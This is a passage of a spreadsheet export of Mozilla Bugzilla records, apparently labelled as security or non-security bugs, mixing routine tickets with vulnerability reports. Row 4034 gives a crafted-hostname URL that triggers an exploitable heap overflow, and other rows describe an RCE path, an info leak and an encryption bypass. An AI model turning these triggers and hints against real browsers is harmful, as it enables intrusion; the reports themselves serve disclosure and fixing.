RCE is achieved by introducing malicious code into the contents of files in the omni.ja archive. This is the same as discussed in bug 1530103.
Although it shouldn't be possible to inject double quotes in a file path in windows as the double quote character is illegal in a file path, Microsoft has confirmed that they won't be fixing this issue (https://www.zerodayinitiative.com/advisories/ZDI-19-1023/)
Credit:
Joshua Graham of TSS</t>
        </is>
      </c>
      <c r="X4026" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4027">
      <c r="A4027" t="n">
        <v>1141081</v>
      </c>
      <c r="B4027" t="inlineStr">
        <is>
          <t>2015-03-09 07:24:53 -0700</t>
        </is>
      </c>
      <c r="C4027" t="inlineStr">
        <is>
          <t>crash in AsyncPaintWaitEvent::AsyncPaintWaitEvent(nsIContent*, bool), often with 0x5a5a5a5e address</t>
        </is>
      </c>
      <c r="D4027" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E4027" t="n">
        <v>1</v>
      </c>
      <c r="F4027" t="n">
        <v>1</v>
      </c>
      <c r="G4027" t="n">
        <v>6</v>
      </c>
      <c r="H4027" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4027" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J4027" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K4027" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4027" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4027" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N4027" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4027" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4027" t="inlineStr">
        <is>
          <t>[adv-main37+]</t>
        </is>
      </c>
      <c r="Q4027" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4027" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4027" t="inlineStr">
        <is>
          <t>mozilla40</t>
        </is>
      </c>
      <c r="T4027" t="n">
        <v>1</v>
      </c>
      <c r="U4027" t="n">
        <v>0</v>
      </c>
      <c r="V4027" t="n">
        <v>57</v>
      </c>
      <c r="W4027" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-b508abe3-d725-42e3-927c-a650e2150306.
=============================================================
Top frames:
0 	xul.dll 	nsCOMPtr&lt;nsILoadGroup&gt;::nsCOMPtr&lt;nsILoadGroup&gt;(nsILoadGroup*) 	xpcom/glue/nsCOMPtr.h
1 	xul.dll 	AsyncPaintWaitEvent::AsyncPaintWaitEvent(nsIContent*, bool) 	dom/plugins/base/nsPluginInstanceOwner.cpp
2 	xul.dll 	nsPluginInstanceOwner::~nsPluginInstanceOwner() 	dom/plugins/base/nsPluginInstanceOwner.cpp
3 	xul.dll 	nsPluginInstanceOwner::`scalar deleting destructor'(unsigned int) 	
4 	xul.dll 	nsPluginInstanceOwner::Release() 	dom/plugins/base/nsPluginInstanceOwner.cpp
5 	xul.dll 	nsTArray_Impl&lt;mozilla::EventListenerManager::Listener, nsTArrayInfallibleAllocator&gt;::DestructRange(unsigned int, unsigned int) 	xpcom/glue/nsTArray.h
6 	xul.dll 	nsTArray_Impl&lt;mozilla::EventListenerManager::Listener, nsTArrayInfallibleAllocator&gt;::RemoveElementsAt(unsigned int, unsigned int) 	xpcom/glue/nsTArray.h
7 	xul.dll 	mozilla::EventListenerManager::RemoveAllListeners() 	dom/events/EventListenerManager.cpp
8 	xul.dll 	nsWindowRoot::~nsWindowRoot() 	dom/base/nsWindowRoot.cpp
9 	xul.dll 	nsWindowRoot::`scalar deleting destructor'(unsigned int) 	
10 	xul.dll 	nsWindowRoot::DeleteCycleCollectable() 	dom/base/nsWindowRoot.cpp
11 	xul.dll 	nsWindowRoot::cycleCollection::DeleteCycleCollectable(void*) 	dom/base/nsWindowRoot.h
12 	xul.dll 	SnowWhiteKiller::~SnowWhiteKiller() 	xpcom/base/nsCycleCollector.cpp
[...]
So far, we only see this with Firefox 37.0b3, but this gets high exploitability rating and an address 0x5a5a5a5e (offset 4 from the memory poisoning) in many cases, so I'm cautiously marking it a security issue. It seems to involve plugins and CC, judging from the stack.
(Click on the Crash Signature field to get more stats and reports.)</t>
        </is>
      </c>
      <c r="X4027" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4028">
      <c r="A4028" t="n">
        <v>1241896</v>
      </c>
      <c r="B4028" t="inlineStr">
        <is>
          <t>2016-01-22 06:42:52 -0800</t>
        </is>
      </c>
      <c r="C4028" t="inlineStr">
        <is>
          <t>Improper usage of ReadBytes in mozilla::net::NetAddr</t>
        </is>
      </c>
      <c r="D4028" t="inlineStr">
        <is>
          <t>2024-02-23 02:56:41 -0800</t>
        </is>
      </c>
      <c r="E4028" t="n">
        <v>1</v>
      </c>
      <c r="F4028" t="n">
        <v>1</v>
      </c>
      <c r="G4028" t="n">
        <v>3</v>
      </c>
      <c r="H4028" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4028" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4028" t="inlineStr">
        <is>
          <t>Networking: DNS</t>
        </is>
      </c>
      <c r="K4028" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4028" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4028" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4028" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4028" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4028" t="inlineStr">
        <is>
          <t>[adv-main47+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q4028" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4028" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4028" t="inlineStr">
        <is>
          <t>mozilla47</t>
        </is>
      </c>
      <c r="T4028" t="n">
        <v>1</v>
      </c>
      <c r="U4028" t="n">
        <v>0</v>
      </c>
      <c r="V4028" t="n">
        <v>9</v>
      </c>
      <c r="W4028" t="inlineStr">
        <is>
          <t>Pickle::ReadBytes[1] does not allocate memory and copies the data out of the serialized object, instead it just returns a pointer into the serialized object and it is up to the caller to do something with that data (usually use memcpy() to copy it to a persistent location).
When unserializing mozilla::net::NetAddr[2][3], ReadBytes is not called properly. NetAddr is defined here[4] with the |raw| union element defined as follows:
&gt; union NetAddr {
&gt;  struct {
&gt;    uint16_t family;
&gt;    char data[14];
&gt;  } raw;
&gt;  ...
&gt; };
|&amp;aResult-&gt;raw.data| returns a pointer to the |data| buffer and casts it to a const char **, now when ReadBytes is called, it will deference that pointer pointer and write a pointer, which points to the serialized data, at the destination.
Which means that the first four or eight bytes of |data| correspond to a pointer and not the actual raw address data.
I file this bug as a security bug out of precaution, since depending on the usage of the NetAddr object, it could lead to info leak.
If this is not the case, I don't see why this should be a security bug.
[1] https://dxr.mozilla.org/mozilla-central/rev/c5da92c5b4906369dee83629f81d647226ac1038/ipc/chromium/src/base/pickle.cc#468
[2] https://dxr.mozilla.org/mozilla-central/rev/6764bc656c1d146962d53710d734c2ac87c2306f/netwerk/ipc/NeckoMessageUtils.h#111
[3] https://dxr.mozilla.org/mozilla-central/rev/6764bc656c1d146962d53710d734c2ac87c2306f/netwerk/ipc/NeckoMessageUtils.h#125
[4] https://dxr.mozilla.org/mozilla-central/rev/c5da92c5b4906369dee83629f81d647226ac1038/netwerk/dns/DNS.h#89</t>
        </is>
      </c>
      <c r="X4028" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4029">
      <c r="A4029" t="n">
        <v>469294</v>
      </c>
      <c r="B4029" t="inlineStr">
        <is>
          <t>2008-12-12 02:21:21 -0800</t>
        </is>
      </c>
      <c r="C4029" t="inlineStr">
        <is>
          <t>Put nightly Fennec nightly builds into separate dated directories on ftp.m.o</t>
        </is>
      </c>
      <c r="D4029" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4029" t="n">
        <v>1</v>
      </c>
      <c r="F4029" t="n">
        <v>1</v>
      </c>
      <c r="G4029" t="n">
        <v>5</v>
      </c>
      <c r="H4029" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4029" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4029" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4029" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4029" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4029" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4029" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4029" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4029" t="inlineStr"/>
      <c r="Q4029" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4029" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4029" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4029" t="n">
        <v>1</v>
      </c>
      <c r="U4029" t="n">
        <v>0</v>
      </c>
      <c r="V4029" t="n">
        <v>4</v>
      </c>
      <c r="W4029" t="inlineStr">
        <is>
          <t>Currently Fennec builds are placed into:
http://ftp.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mobile-browser-linux-arm/
However, we need to place builds in separate dated directories under mobile-browser-linux-arm. This was not done in the earlier automation work in October, for the sake of speed - we hit some unexpected complications trying to extract and use the dated directories code that is already in use for Firefox automation - so we skipped it at the time.
This is important to mobile developers because currently, each new build of fennec-*-armel.deb overwrites the previous fennec-*-armel.deb...so its impossible to re-visit old builds once new builds are generated.
From talking with Stuart &amp; Brad, it doesnt matter to them what we nameing scheme we use for the dated directories, so long as they are unique, and also that they sort newer builds sort after older builds.
There was some unresolved discussion about possibly creating a "latest" symlink in http://ftp.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mobile-browser-linux-arm/ pointing to latest builds, in latest dated directory. This was not resolved, so not clear what needs to be done. However, noting here for completeness.</t>
        </is>
      </c>
      <c r="X4029" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4030">
      <c r="A4030" t="n">
        <v>238219</v>
      </c>
      <c r="B4030" t="inlineStr">
        <is>
          <t>2004-03-21 17:00:22 -0800</t>
        </is>
      </c>
      <c r="C4030" t="inlineStr">
        <is>
          <t>nsIDocument changes cause Adobe SVG plugin to crash [was: crash [@ nsCSubstring::SetCapacity]]</t>
        </is>
      </c>
      <c r="D4030" t="inlineStr">
        <is>
          <t>2004-03-28 20:07:40 -0800</t>
        </is>
      </c>
      <c r="E4030" t="n">
        <v>1</v>
      </c>
      <c r="F4030" t="n">
        <v>1</v>
      </c>
      <c r="G4030" t="n">
        <v>3</v>
      </c>
      <c r="H4030" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4030" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4030" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K4030" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4030" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4030" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N4030" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4030" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4030" t="inlineStr"/>
      <c r="Q4030" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4030" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4030" t="inlineStr">
        <is>
          <t>mozilla1.7final</t>
        </is>
      </c>
      <c r="T4030" t="n">
        <v>1</v>
      </c>
      <c r="U4030" t="n">
        <v>0</v>
      </c>
      <c r="V4030" t="n">
        <v>15</v>
      </c>
      <c r="W4030" t="inlineStr">
        <is>
          <t>#8 top crash in early 1.7b data
not much to do on here, but could it be related to string defrag landing?
notice svg on the stack too.  might need it to understand the bug better.
     Count   Offset    Real Signature
[ 3   nsCSubstring::SetCapacity 6d2d286b -
[ 1   nsCSubstring::SetCapacity ee83ea6e - 
[ 1   nsCSubstring::SetCapacity 5db5f36b - 
     Crash date range: 19-MAR-04 to 21-MAR-04
     Min/Max Seconds since last crash: 27 - 4461
     Min/Max Runtime: 418 - 4461
     Count   Platform List 
     3   [Windows NT 5.1 build 2600]   
     1   [Windows NT 5.0 build 2195]   
     1   [Windows 98 4.90 build 73010104]   
     Count   Build Id List 
     5   2004031615
     No of Unique Users         3
 Stack trace(Frame) 
	 nsCSubstring::SetCapacity
[c:/builds/tinderbox/Mozilla1.7b/WINNT_5.0_Clobber/mozilla/xpcom/string/src/nsTSubstring.cpp
 line 445] 
	 nsCSubstring::SetLength
[c:/builds/tinderbox/Mozilla1.7b/WINNT_5.0_Clobber/mozilla/xpcom/string/src/nsTSubstring.cpp
 line 481] 
	 nsCSubstring::Assign
[c:/builds/tinderbox/Mozilla1.7b/WINNT_5.0_Clobber/mozilla/xpcom/string/src/nsTSubstring.cpp
 line 278] 
	 nsCSubstring::Assign
[c:/builds/tinderbox/Mozilla1.7b/WINNT_5.0_Clobber/mozilla/xpcom/string/src/nsTSubstring.cpp
 line 330] 
	 nsCSubstring::Assign
[c:/builds/tinderbox/Mozilla1.7b/WINNT_5.0_Clobber/mozilla/xpcom/string/src/nsTSubstring.cpp
 line 358] 
	 nsDocument::SetDocumentCharacterSet
[c:/builds/tinderbox/Mozilla1.7b/WINNT_5.0_Clobber/mozilla/content/base/src/nsDocument.cpp
 line 963] 
	 NPSVG3.dll + 0x4194 (0x53004194)  
	 NPSVG3.dll + 0x3c23 (0x53003c23)  
	 NPSVG3.dll + 0x5058 (0x53005058)  
	 nsPluginStreamListenerPeer::SetUpStreamListener
[c:/builds/tinderbox/Mozilla1.7b/WINNT_5.0_Clobber/mozilla/modules/plugin/base/src/nsPluginHostImpl.cpp
 line 2456] 
	 nsPluginStreamListenerPeer::OnStartRequest
[c:/builds/tinderbox/Mozilla1.7b/WINNT_5.0_Clobber/mozilla/modules/plugin/base/src/nsPluginHostImpl.cpp
 line 2101] 
	 nsHttpChannel::CallOnStartRequest
[c:/builds/tinderbox/Mozilla1.7b/WINNT_5.0_Clobber/mozilla/netwerk/protocol/http/src/nsHttpChannel.cpp
 line 638] 
	 nsHttpChannel::ProcessNormal
[c:/builds/tinderbox/Mozilla1.7b/WINNT_5.0_Clobber/mozilla/netwerk/protocol/http/src/nsHttpChannel.cpp
 line 767] 
	 nsHttpChannel::ProcessResponse
[c:/builds/tinderbox/Mozilla1.7b/WINNT_5.0_Clobber/mozilla/netwerk/protocol/http/src/nsHttpChannel.cpp
 line 722] 
	 nsHttpChannel::OnStartRequest
[c:/builds/tinderbox/Mozilla1.7b/WINNT_5.0_Clobber/mozilla/netwerk/protocol/http/src/nsHttpChannel.cpp
 line 3315] 
	 nsInputStreamPump::OnStateStart
[c:/builds/tinderbox/Mozilla1.7b/WINNT_5.0_Clobber/mozilla/netwerk/base/src/nsInputStreamPump.cpp
 line 381] 
	 nsInputStreamPump::OnInputStreamReady
[c:/builds/tinderbox/Mozilla1.7b/WINNT_5.0_Clobber/mozilla/netwerk/base/src/nsInputStreamPump.cpp
 line 343] 
	 nsInputStreamReadyEvent::EventHandler
[c:/builds/tinderbox/Mozilla1.7b/WINNT_5.0_Clobber/mozilla/xpcom/io/nsStreamUtils.cpp
 line 119] 
	 PL_HandleEvent
[c:/builds/tinderbox/Mozilla1.7b/WINNT_5.0_Clobber/mozilla/xpcom/threads/plevent.c
 line 672] 
	 PL_ProcessPendingEvents
[c:/builds/tinderbox/Mozilla1.7b/WINNT_5.0_Clobber/mozilla/xpcom/threads/plevent.c
 line 610] 
	 _md_EventReceiverProc
[c:/builds/tinderbox/Mozilla1.7b/WINNT_5.0_Clobber/mozilla/xpcom/threads/plevent.c
 line 1413] 
	 USER32.dll + 0x3d79 (0x77cf3d79)  
	 USER32.dll + 0x3ddf (0x77cf3ddf)  
	 nsAppShellService::Run
[c:/builds/tinderbox/Mozilla1.7b/WINNT_5.0_Clobber/mozilla/xpfe/appshell/src/nsAppShellService.cpp
 line 524] 
	 main1
[c:/builds/tinderbox/Mozilla1.7b/WINNT_5.0_Clobber/mozilla/xpfe/bootstrap/nsAppRunner.cpp
 line 1308] 
	 main
[c:/builds/tinderbox/Mozilla1.7b/WINNT_5.0_Clobber/mozilla/xpfe/bootstrap/nsAppRunner.cpp
 line 1712] 
	 WinMain
[c:/builds/tinderbox/Mozilla1.7b/WINNT_5.0_Clobber/mozilla/xpfe/bootstrap/nsAppRunner.cpp
 line 1734] 
	 WinMainCRTStartup()  
	 kernel32.dll + 0x214c7 (0x77e414c7)</t>
        </is>
      </c>
      <c r="X4030" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4031">
      <c r="A4031" t="n">
        <v>927953</v>
      </c>
      <c r="B4031" t="inlineStr">
        <is>
          <t>2013-10-17 10:13:46 -0700</t>
        </is>
      </c>
      <c r="C4031" t="inlineStr">
        <is>
          <t>Provision a cert for mozillascience.org</t>
        </is>
      </c>
      <c r="D4031" t="inlineStr">
        <is>
          <t>2013-10-23 06:15:50 -0700</t>
        </is>
      </c>
      <c r="E4031" t="n">
        <v>1</v>
      </c>
      <c r="F4031" t="n">
        <v>1</v>
      </c>
      <c r="G4031" t="n">
        <v>5</v>
      </c>
      <c r="H4031" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4031" t="inlineStr">
        <is>
          <t>Infrastructure &amp; Operations</t>
        </is>
      </c>
      <c r="J4031" t="inlineStr">
        <is>
          <t>SSL Certificates</t>
        </is>
      </c>
      <c r="K4031" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4031" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4031" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4031" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4031" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4031" t="inlineStr"/>
      <c r="Q4031" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4031" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4031" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4031" t="n">
        <v>1</v>
      </c>
      <c r="U4031" t="n">
        <v>0</v>
      </c>
      <c r="V4031" t="n">
        <v>4</v>
      </c>
      <c r="W4031" t="inlineStr">
        <is>
          <t>Good day!
Can we please provision an SSL cert for mozillascience.org ?
Many thanks!
JP</t>
        </is>
      </c>
      <c r="X4031" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4032">
      <c r="A4032" t="n">
        <v>503597</v>
      </c>
      <c r="B4032" t="inlineStr">
        <is>
          <t>2009-07-10 15:08:44 -0700</t>
        </is>
      </c>
      <c r="C4032" t="inlineStr">
        <is>
          <t>configure.in silently disables necko wifi when header is missing (Linux only)</t>
        </is>
      </c>
      <c r="D4032" t="inlineStr">
        <is>
          <t>2018-03-02 12:12:20 -0800</t>
        </is>
      </c>
      <c r="E4032" t="n">
        <v>1</v>
      </c>
      <c r="F4032" t="n">
        <v>1</v>
      </c>
      <c r="G4032" t="n">
        <v>7</v>
      </c>
      <c r="H4032" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4032" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J4032" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4032" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4032" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4032" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4032" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4032" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4032" t="inlineStr"/>
      <c r="Q4032" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4032" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4032" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T4032" t="n">
        <v>1</v>
      </c>
      <c r="U4032" t="n">
        <v>0</v>
      </c>
      <c r="V4032" t="n">
        <v>10</v>
      </c>
      <c r="W4032" t="inlineStr">
        <is>
          <t>Created attachment 387957
patch
On Linux only, configure.in silently disables NECKO_WIFI when iwlib.h isn't found.  This is inconsistent with other platforms (where we give an error saying to --disable-necko-wifi) and with the good practice of not disabling things silently (especially major new features of the browser).  (It wouldn't surprise me if some Linux distros end up shipping Firefox with wifi geolocation broken as a result.)
The attached patch makes this an error, consistent with the unknown platform case, but also provides some advice on getting iwlib.h.</t>
        </is>
      </c>
      <c r="X4032" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4033">
      <c r="A4033" t="n">
        <v>901769</v>
      </c>
      <c r="B4033" t="inlineStr">
        <is>
          <t>2013-08-05 16:37:57 -0700</t>
        </is>
      </c>
      <c r="C4033" t="inlineStr">
        <is>
          <t>Rocketfuel APIs should be CORSed</t>
        </is>
      </c>
      <c r="D4033" t="inlineStr">
        <is>
          <t>2013-08-06 09:32:45 -0700</t>
        </is>
      </c>
      <c r="E4033" t="n">
        <v>1</v>
      </c>
      <c r="F4033" t="n">
        <v>1</v>
      </c>
      <c r="G4033" t="n">
        <v>6</v>
      </c>
      <c r="H4033" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4033" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J4033" t="inlineStr">
        <is>
          <t>API</t>
        </is>
      </c>
      <c r="K4033" t="inlineStr">
        <is>
          <t>1.5</t>
        </is>
      </c>
      <c r="L4033" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4033" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4033" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4033" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4033" t="inlineStr">
        <is>
          <t>[qa-]</t>
        </is>
      </c>
      <c r="Q4033" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4033" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4033" t="inlineStr">
        <is>
          <t>2013-08-06</t>
        </is>
      </c>
      <c r="T4033" t="n">
        <v>1</v>
      </c>
      <c r="U4033" t="n">
        <v>0</v>
      </c>
      <c r="V4033" t="n">
        <v>2</v>
      </c>
      <c r="W4033" t="inlineStr">
        <is>
          <t>The `Access-Control-Allow-Origin` header needs to be set for the /api/v1/collections APIs.</t>
        </is>
      </c>
      <c r="X4033" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4034">
      <c r="A4034" t="n">
        <v>256316</v>
      </c>
      <c r="B4034" t="inlineStr">
        <is>
          <t>2004-08-20 10:30:15 -0700</t>
        </is>
      </c>
      <c r="C4034" t="inlineStr">
        <is>
          <t>non-ascii char in URL lead to heap overrun</t>
        </is>
      </c>
      <c r="D4034" t="inlineStr">
        <is>
          <t>2006-03-12 17:53:50 -0800</t>
        </is>
      </c>
      <c r="E4034" t="n">
        <v>1</v>
      </c>
      <c r="F4034" t="n">
        <v>1</v>
      </c>
      <c r="G4034" t="n">
        <v>3</v>
      </c>
      <c r="H4034" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4034" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4034" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K4034" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4034" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4034" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4034" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4034" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4034" t="inlineStr">
        <is>
          <t>[sg:fix]</t>
        </is>
      </c>
      <c r="Q4034" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4034" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4034" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4034" t="n">
        <v>1</v>
      </c>
      <c r="U4034" t="n">
        <v>0</v>
      </c>
      <c r="V4034" t="n">
        <v>19</v>
      </c>
      <c r="W4034" t="inlineStr">
        <is>
          <t>The SBB FAQ says :
"However as a special exception we will also consider paying rewards
for bugs found in the most recent releases from designated stable
branches (e.g., from the Mozilla 1.7 branch after 1.8 is released) if
the bugs are not present in the most recent version but were never
recognized and fixed as security bugs."
So I thought you would be interested to know about bugs that were
fixed as standard bugs, but which are actually critical security
bugs.
So I investigated some reported Mozilla crashes and actually found
something very interesting in bug #254671.
After some hours spent in finding the actual cause of the bug, and
finding that it is exploitable, I realised the bug has been discussed
and (should have been) fixed in bug #250900. So I am not going to give
detailed technical details about the bug, you can see the discussion
there.
This bug has a very critical security impact which has been missed by
Mozilla developpers. Here is the reason why:
- put a non-ascii character in a long hostname in an url. Ex:
  http://AAAAAAAAAAAAAAèAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
- the UTF8 conversion of the hostname is called and fails, but returns
  a SUCCESS error code. So the variable  approxLen is incremented by
  0 instead of strlen(mHost)  (this is the bug)
- a buffer is allocated with length  approxLen + 32 (which is
  too short)
- then mHost is copied into this buffer --&gt; BUFFER OVERFLOW ON THE HEAP
  WITH ARBITRARY DATA SUPPLIED IN THE HOSTNAME BY THE ATTACKER
The bug exists on Mozilla 1.7.2 (Linux and Windows), at least
in the version I downloaded from your website 10 days ago.
I verified that on Windows systems, the bug leads to MOV [EAX], ECX
where we control EAX and ECX (0x41414141), which is the common 
situation in exploitable heap overflows.
I think all OSes are vulnerable, and that this bug can be exploited
when viewing a website or when clicking on a link in an email.
Cheers
Gael Delalleau</t>
        </is>
      </c>
      <c r="X4034" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4035">
      <c r="A4035" t="n">
        <v>1730935</v>
      </c>
      <c r="B4035" t="inlineStr">
        <is>
          <t>2021-09-15 10:10:47 -0700</t>
        </is>
      </c>
      <c r="C4035" t="inlineStr">
        <is>
          <t>Opportunistic Security for HTTP/2 opt-in checking partial bypass</t>
        </is>
      </c>
      <c r="D4035" t="inlineStr">
        <is>
          <t>2024-05-04 14:18:02 -0700</t>
        </is>
      </c>
      <c r="E4035" t="n">
        <v>1</v>
      </c>
      <c r="F4035" t="n">
        <v>1</v>
      </c>
      <c r="G4035" t="n">
        <v>3</v>
      </c>
      <c r="H4035" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4035" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4035" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K4035" t="inlineStr">
        <is>
          <t>Firefox 92</t>
        </is>
      </c>
      <c r="L4035" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4035" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4035" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4035" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4035" t="inlineStr">
        <is>
          <t>[necko-triaged][sec-survey][adv-main94+][adv-esr91.3+]</t>
        </is>
      </c>
      <c r="Q4035" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4035" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S4035" t="inlineStr">
        <is>
          <t>95 Branch</t>
        </is>
      </c>
      <c r="T4035" t="n">
        <v>1</v>
      </c>
      <c r="U4035" t="n">
        <v>0</v>
      </c>
      <c r="V4035" t="n">
        <v>18</v>
      </c>
      <c r="W4035" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Steps to reproduce:
This report is about a Firefox's bug in opt-in process of OE (Opportunistic Encryption, RFC 8164).
Let's say the association between 80 (unencrypted) and 443 (encrypted) is made by opt-in checking using .well-known JSON. Then content from port 443 (i.e. alternative service) is treated as if it is provided from port 80. It means, by design, opted-in encrypted content can be read by unencrypted content thanks to Same Origin Policy.
---------------------------------------------------------------------
■example.jp (IPAddr: 1.1.1.1)
